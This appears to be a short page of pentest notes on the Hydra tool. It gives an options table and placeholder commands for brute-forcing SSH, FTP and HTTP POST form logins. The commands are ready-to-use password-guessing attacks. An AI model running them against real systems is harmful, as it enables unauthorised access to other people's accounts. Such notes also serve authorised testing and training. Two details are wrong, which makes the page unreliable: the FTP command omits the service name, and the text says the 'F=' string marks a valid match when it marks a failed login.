CtrlK
Pentest Notes / Exploitation / Password Cracking
Hydra
Options
| Option | Description |
|---|---|
| -l | single username |
| -L | username file |
| -p | single password |
| -P | password file |
| -t | sets the number of threads to spawn |
| -V | Verbose output |
SSH Bruteforce
hydra -l [username] -P [password_file] [MACHINE_IP] ssh
FTP Bruteforce
hydra -l [username] -P [password_file] [MACHINE_IP]
HTTP POST Form Bruteforce
hydra -l [username] -P [password_file] [MACHINE_IP] http-post-form "/:username=^USER^&password=^PASS^:F=[message_to_check_against]" -V
F= whatever is present here will be checked. If the response contains this, it's considered a valid match.